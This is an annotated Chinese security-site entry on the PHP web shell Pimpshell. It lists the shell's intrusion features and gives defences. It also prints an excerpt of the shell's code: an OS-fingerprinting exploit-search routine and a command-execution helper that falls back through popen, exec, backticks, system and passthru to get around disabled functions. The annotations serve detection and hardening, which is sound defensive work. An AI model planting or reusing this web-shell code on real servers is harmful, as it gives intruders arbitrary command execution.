Pimpshell [beta revis. 2]

2011-12-14 14:48:19 来源:本站原创,请勿转载 浏览:300
Pimpshell [beta revis. 2]

木马名称:Pimpshell [beta revis. 2]
木马格式:php
默认密码:
木马作用:功能超多,文件管理,运行CMD,查看IIS信息,进程信息,系统服务,用户信息,系统信息,文件搜索,注册表,端口扫描,数据库连接,端口映射,PHP工具,Cpanel账户搜索,开代理,注入,挂马……

运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:Pimpshell功能确实有点强大,要注意防范!
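防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 Pimpshell 这个 php 网页木马。除依赖查杀工具外,还应在 php.ini 中通过 disable_functions 禁用 exec、system、passthru、shell_exec、popen 等命令执行函数,并禁止上传目录解析执行 PHP 脚本。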

Pimpshell部分代码:
// Exploit search (host fingerprinting).
// Reads the OS name and release with php_uname() and builds two search URLs
// (milw0rm.com and packetstormsecurity.org) keyed on that version string.
// Nothing in this excerpt requests the URLs; how $millink / $stormlink are
// used is outside the visible code.
// Analyst note: the literal URL prefixes below are fixed strings, so they can
// serve as content indicators when scanning a webroot for this sample.
//
// `r` and `s` are bare words, not quoted strings. PHP 5/7 fall back to the
// strings 'r' / 's' with a notice or warning; PHP 8 throws an Error for an
// undefined constant, so this excerpt only runs as written on older PHP.
$Lversion = php_uname(r);
$OSV = php_uname(s);
// eregi() is a case-insensitive regex match that was removed in PHP 7.0.
if(eregi('Linux',$OSV))
{
// Linux: keep the first six characters of the release string.
$Lversion=substr($Lversion,0,6);
$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
$stormlink="http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+".$Lversion;
}else{
// Any other OS: keep the first three characters and search on "<OS name> <version>".
$Lversion=substr($Lversion,0,3);
$millink="http://milw0rm.com/search.php?dong=".$OSV.' '.$Lversion;
$stormlink="http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=".$OSV.'+'.$Lversion;
}
//End of milw0rm search
//w4ck1ng Shell
// Command-execution helper of the web shell. myshellexec() is defined only if
// no function of that name exists yet, and one of two variants is chosen at
// load time depending on whether popen() is callable.
// The origin of the command string is not visible in this excerpt; the callers
// are elsewhere in the sample.
// Analyst notes:
//  - Between them the two variants use popen, exec, the backtick operator,
//    system and passthru. A disable_functions list that covers only some of
//    these leaves the others available; the backtick operator is switched off
//    by disabling shell_exec.
//  - NOTE(review): the name myshellexec also appears in other PHP web shells of
//    the same era, so treat it as a weak indicator on its own and combine it
//    with other strings from the sample.
if (!function_exists('myshellexec'))
{
if(is_callable('popen')){
// Variant 1 (popen available): runs the command in a subshell with stderr
// merged into stdout ("(...)2>&1") and returns everything read from the pipe.
// Returns the integer 126 when popen() fails.
function myshellexec($command) {
if (!($p=popen("($command)2>&1",'r'))) {
return 126;
}
while (!feof($p)) {
// fgets() with length 1000 returns at most 999 bytes per call.
$line=fgets($p,1000);
// $out is never initialised in this function, so the first append raises an
// undefined-variable notice/warning; where PHP logs those, it may show up in
// the error log.
$out .= $line;
}
pclose($p);
return $out;
}
}else{
// Variant 2 (popen not callable): tries several execution primitives in turn
// and returns the captured output, or '' when $cmd is empty.
function myshellexec($cmd)
{
 // $disablefunc is a global defined outside this excerpt; presumably the
 // parsed disable_functions list - confirm against the full sample.
 global $disablefunc;
 $result = '';
 if (!empty($cmd))
 {
  // 1) exec(): output lines are collected into an array and joined with "\n".
  if (is_callable('exec') and !in_array('exec',$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  // 2) Backtick operator: not checked against $disablefunc. Any value other
  //    than FALSE (including null or empty output) satisfies this branch, so
  //    the fallbacks below run only when the operator returns FALSE.
  elseif (($result = `$cmd`) !== FALSE) {}
  // 3) system() / 4) passthru(): both print directly, so the code saves the
  //    current output buffer in $v, clears it, runs the command, takes the
  //    buffer as $result, clears again and re-emits $v. This relies on output
  //    buffering being active; the @ operators hide the errors otherwise.
  elseif (is_callable('system') and !in_array('system',$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable('passthru') and !in_array('passthru',$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  // 5) popen(): reads the pipe in 1024-byte chunks.
  //    NOTE(review): this variant is only defined when is_callable('popen')
  //    was false at load time, so this branch looks unreachable - confirm.
  elseif (is_resource($fp = popen($cmd,'r')))
  {
   $result = '';
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
}
}
